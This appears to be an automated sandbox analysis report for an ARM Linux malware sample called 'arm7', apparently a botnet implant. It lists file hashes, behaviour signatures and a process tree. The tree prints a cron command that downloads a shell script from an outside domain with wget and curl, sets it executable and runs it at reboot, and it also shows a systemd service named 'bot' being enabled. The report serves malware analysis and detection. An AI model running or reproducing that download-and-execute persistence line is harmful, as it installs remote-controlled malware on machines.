Resubmissions

27-10-2024 11:34

241027-nptt5avndx 7

27-10-2024 11:20

241027-nfkj4avmfv 7

Analysis

  • max time kernel
    599s
  • max time network
    650s
  • platform
    debian-12_armhf
  • resource
    debian12-armhf-20240221-en
  • resource tags

    arch:armhfimage:debian12-armhf-20240221-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem
  • submitted
    27-10-2024 11:34

General

  • Target

    arm7

  • Size

    102KB

  • MD5

    f89985f03f8a27ab418e05bc232e4387

  • SHA1

    b57e7df8cf4013be718f56be205e14919101e87a

  • SHA256

    15af70f91b8099d491f6d891cd063301b8e40e063aa0554294ec28cab71753c6

  • SHA512

    d4a66a8054dbd4cfbe2865c64bfde1e3dff384b1504a04b8ee21384737960de425e1069a2de14b6972420c99fbc40f0d11a7568d059678837b01c5868cd336b9

  • SSDEEP

    3072:lK8+viZckDqI5GaHSfCr8ZwTEEs2S8SjjIxX:lK8bZckDlGaHSfCr8iTEWSJjkxX

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 64 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Modifies systemd 2 TTPs 1 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

  • Changes its process name 1 IoCs
  • Command and Scripting Interpreter: Unix Shell 1 TTPs 1 IoCs

    Execute scripts via Unix Shell.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/arm7
    /tmp/arm7 massload
    1⤵
    • Renames itself
    • Modifies systemd
    • Changes its process name
    • Reads runtime system information
    PID:1766
    • /bin/sh
      /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:1769
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        PID:1772
      • /usr/bin/crontab
        crontab -l
        3⤵
          PID:1773
      • /bin/sh
        /bin/sh -c "/bin/systemctl enable bot"
        2⤵
        • Command and Scripting Interpreter: Unix Shell
        PID:1776
        • /bin/systemctl
          /bin/systemctl enable bot
          3⤵
          • Reads runtime system information
          PID:1777

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /usr/lib/systemd/system/bot.service

      Filesize

      302B

      MD5

      a4e30f6ce6fb6cf00e133f3c93fb5449

      SHA1

      67b7de93a672ada4abfe11e339dc2e270c61b69d

      SHA256

      a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede

      SHA512

      893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25

    • /var/spool/cron/crontabs/tmp.T3XU0o

      Filesize

      306B

      MD5

      b32e71ac9a7a75ef83a5b90ad41a7312

      SHA1

      d28c6dfc1e4a439d39ed44a02a28b48253bd7290

      SHA256

      cbda160e0fdff8fe32d37f0aaed0ac570c8a2c805562fe9ea5f767da0493f0d3

      SHA512

      8a4c3da43046c9d8538bbc312b9c3aca38267b602bad07e2a216ecd6b4e6af820de2e8a3989e9fdb34a6b70f410bdf98f30a8850c28fb353bcf14125760890a8